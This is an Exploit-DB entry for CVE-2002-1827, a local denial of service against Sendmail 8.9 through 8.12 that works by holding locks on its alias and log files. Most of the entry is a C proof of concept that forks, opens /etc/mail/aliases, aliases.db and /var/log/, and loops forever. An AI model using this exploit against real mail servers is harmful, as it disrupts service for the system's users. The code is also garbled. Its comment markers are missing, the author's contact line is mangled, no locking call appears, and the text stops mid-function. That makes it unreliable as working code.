Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial of Service Vulnerability 2

ID EDB-ID:21477
Type exploitdb
Reporter zillion
Modified 2002-05-24T00:00:00


Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial Of Service Vulnerability (2). CVE-2002-1827 . Dos exploit for linux platform

Sendmail is a MTA for Unix and Linux variants.
There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation. 

#include <fcntl.h>
#include <unistd.h>


Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info:

zillion (at &&


int main() {

  if(fork() == 0) {

    char *lock1 = "/etc/mail/aliases";
    char *lock2 = "/etc/mail/aliases.db";
    char *lock3 = "/var/log/";

    int fd;
    fd = open(lock1,O_RDONLY);

    fd = open(lock2,O_RDONLY);

    fd = open(lock3,O_RDONLY);

    /* We are here to stay! */

    for(;;) {}